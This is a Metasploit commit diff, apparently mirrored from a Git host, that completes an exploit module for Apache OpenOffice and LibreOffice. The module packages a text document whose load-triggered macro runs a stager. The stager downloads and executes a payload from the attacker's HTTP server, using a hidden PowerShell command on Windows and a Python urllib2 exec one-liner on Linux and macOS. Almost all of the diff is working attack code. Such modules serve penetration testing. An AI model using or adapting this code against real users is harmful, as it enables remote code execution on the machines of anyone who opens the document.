github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-07-18 18:31:41 +02:00
Code Releases Activity

Completed version of openoffice_document_macro

Browse Source
This commit is contained in:
wchen-r7 2017-02-08 16:29:40 -06:00
parent cefbee2df4
commit 047a9b17cf
4 changed files with 217 additions and 126 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
data/exploits/openoffice_document_macro/Basic/Standard/Module1.xml
View File

@ -2,7 +2,5 @@
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM ***** BASIC *****
Sub OnLoad
MsgBox &quot;Auto1111?&quot;
End Sub
</script:module>
CODEGOESHERE
</script:module>

2
data/exploits/openoffice_document_macro/content.xml
View File

@ -1,2 +1,2 @@
<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:textooo="http://openoffice.org/2013/office" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" office:version="1.2"><office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&amp;location=document" xlink:type="simple"/></office:event-listeners></office:scripts><office:font-face-decls><style:font-face style:name="Mangal1" svg:font-family="Mangal"/><style:font-face style:name="Times New Roman" svg:font-family="&apos;Times New Roman&apos;" style:font-family-generic="roman" style:font-pitch="variable"/><style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="swiss" style:font-pitch="variable"/><style:font-face style:name="Mangal" svg:font-family="Mangal" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="Microsoft YaHei" svg:font-family="&apos;Microsoft YaHei&apos;" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="SimSun" svg:font-family="SimSun" style:font-family-generic="system" style:font-pitch="variable"/></office:font-face-decls><office:automatic-styles/><office:body><office:text><text:sequence-decls><text:sequence-decl text:display-outline-level="0" text:name="Illustration"/><text:sequence-decl text:display-outline-level="0" text:name="Table"/><text:sequence-decl text:display-outline-level="0" text:name="Text"/><text:sequence-decl text:display-outline-level="0" text:name="Drawing"/></text:sequence-decls><text:p text:style-name="Standard"/></office:text></office:body></office:document-content>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:textooo="http://openoffice.org/2013/office" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" office:version="1.2"><office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&amp;location=document" xlink:type="simple"/></office:event-listeners></office:scripts><office:font-face-decls><style:font-face style:name="Mangal1" svg:font-family="Mangal"/><style:font-face style:name="Times New Roman" svg:font-family="&apos;Times New Roman&apos;" style:font-family-generic="roman" style:font-pitch="variable"/><style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="swiss" style:font-pitch="variable"/><style:font-face style:name="Mangal" svg:font-family="Mangal" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="Microsoft YaHei" svg:font-family="&apos;Microsoft YaHei&apos;" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="SimSun" svg:font-family="SimSun" style:font-family-generic="system" style:font-pitch="variable"/></office:font-face-decls><office:automatic-styles/><office:body>DOCBODYGOESHER<office:text><text:sequence-decls><text:sequence-decl text:display-outline-level="0" text:name="Illustration"/><text:sequence-decl text:display-outline-level="0" text:name="Table"/><text:sequence-decl text:display-outline-level="0" text:name="Text"/><text:sequence-decl text:display-outline-level="0" text:name="Drawing"/></text:sequence-decls><text:p text:style-name="Standard"/></office:text></office:body></office:document-content>

121
modules/exploits/multi/fileformat/openoffice_document_macro.rb
View File

@ -1,121 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
WINDOWSGUI = 'windows'
OSXGUI = 'osx'
LINUXGUI = 'linux'
def initialize(info={})
super(update_info(info,
'Name' => "Apache OpenOffice Text Document Malicious Macro Execution",
'Description' => %q{
This module generates an Apache OpenOffice Text Document with a malicious macro in it.
For exploit successfully, the targeted user must adjust the security level in Macro
Security to either Medium or Low. If set to Medium, a prompt is presented to the user
to enable or disable the macro. If set to Low, the macro can automatically run without
any warning.
The module also works against LibreOffice.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r' # Metasploit
],
'References' =>
[
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => true
},
'Platform' => 'win',
'Targets' =>
[
['Apache OpenOffice', {}]
],
'Privileged' => false,
'DisclosureDate' => "Jan 10 2017",
'DefaultTarget' => 0
))
register_options([
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new('FILENAME', [true, 'The OpoenOffice Text document name', 'msf.odt'])
], self.class)
end
def macro_code
%Q|
function GetOS() as string
select case getGUIType
case 1:
GetOS = "#{WINDOWSGUI}"
case 3:
GetOS = "#{OSXGUI}"
case 4:
GetOS = "#{LINUXGUI}"
case
end select
end function
|
end
def on_file_read(short_fname, full_fname)
buf = File.read(full_fname)
case short_fname
when /content\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /Module1\.xml/
buf.gsub!(/CODEGOESHERE/, macro_code)
end
yield short_fname, buf
end
def package_odt(path)
zip = Rex::Zip::Archive.new
Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')
if File.directory?(file)
print_status("Packaging directory: #{file}")
zip.add_file(p)
else
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}")
zip.add_file(fname, buf)
end
end
end
zip.pack
end
def exploit
print_status('Generating our odt file...')
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'openoffice_document_macro')
docm = package_docm(path)
file_create(docm)
super
end
end

214
modules/exploits/multi/misc/openoffice_document_macro.rb Normal file
View File

@ -0,0 +1,214 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
require 'cgi'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer
WINDOWSGUI = 'windows'
OSXGUI = 'osx'
LINUXGUI = 'linux'
def initialize(info={})
super(update_info(info,
'Name' => "Apache OpenOffice Text Document Malicious Macro Execution",
'Description' => %q{
This module generates an Apache OpenOffice Text Document with a malicious macro in it.
For exploit successfully, the targeted user must adjust the security level in Macro
Security to either Medium or Low. If set to Medium, a prompt is presented to the user
to enable or disable the macro. If set to Low, the macro can automatically run without
any warning.
The module also works against LibreOffice.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r' # Metasploit
],
'References' =>
[
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => false
},
'Targets' =>
[
[
'Apache OpenOffice on Windows (PSH)', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}],
[
'Apache OpenOffice on Linux/OSX (Python)', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON
}]
],
'Privileged' => false,
'DisclosureDate' => "Feb 8 2017"
))
register_options([
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new('FILENAME', [true, 'The OpoenOffice Text document name', 'msf.odt'])
], self.class)
end
def on_request_uri(cli, req)
print_status("Sending payload")
if target.name =~ /PSH/
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
else
p = payload.encoded
end
send_response(cli, p, 'Content-Type' => 'application/octet-stream')
end
def primer
print_status("Generating our odt file for #{target.name}...")
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'openoffice_document_macro')
docm = package_odt(path)
file_create(docm)
end
def get_windows_stager
%Q|Shell("cmd.exe /C ""#{generate_psh_stager}""")|
end
def get_unix_stager
%Q|Shell("#{generate_python_stager}")|
end
def generate_psh_stager
@windows_psh_stager ||= lambda {
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)
download_and_run = "#{ignore_cert}#{download_string}"
generate_psh_command_line(
noprofile: true,
windowstyle: 'hidden',
command: download_and_run)
}.call
end
def generate_python_stager
@python_stager ||= lambda {
%Q|python -c ""import urllib2; r = urllib2.urlopen('#{get_uri}'); exec(r.read());""|
}.call
end
def get_statger
case target.name
when /PSH/
get_windows_stager
when /Python/
get_unix_stager
end
end
# This macro code has the following in mind:
# 1. It checks the platform to eliminate less misfires. Since we have only tested on Windows/Linux/OSX,
# we only want to fire at those.
# 2. Originally, I tried to embed the payload in the macro code, write it out and then execute it.
# This turned out to be problematic, because for some reason OpenOffice is not able to
# write a large string to a file (I've tried either shell("echo") or using the macro API).
# The stager code is similar to web_delivery.
def macro_code
CGI.escapeHTML(%Q|
Sub OnLoad
Dim os as string
os = GetOS
If os = "#{WINDOWSGUI}" OR os = "#{OSXGUI}" OR os = "#{LINUXGUI}" Then
Exploit
end If
End Sub
Sub Exploit
#{get_statger}
End Sub
Function GetOS() as string
select case getGUIType
case 1:
GetOS = "#{WINDOWSGUI}"
case 3:
GetOS = "#{OSXGUI}"
case 4:
GetOS = "#{LINUXGUI}"
end select
End Function
Function GetExtName() as string
select case GetOS
case "#{WINDOWSGUI}"
GetFileName = "exe"
case else
GetFileName = "bin"
end select
End Function
|)
end
def on_file_read(short_fname, full_fname)
buf = File.read(full_fname)
case short_fname
when /content\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /Module1\.xml/
buf.gsub!(/CODEGOESHERE/, macro_code)
end
yield short_fname, buf
end
def package_odt(path)
zip = Rex::Zip::Archive.new
Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')
if File.directory?(file)
print_status("Packaging directory: #{file}")
zip.add_file(p)
else
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}")
zip.add_file(fname, buf)
end
end
end
zip.pack
end
def exploit
super
end
end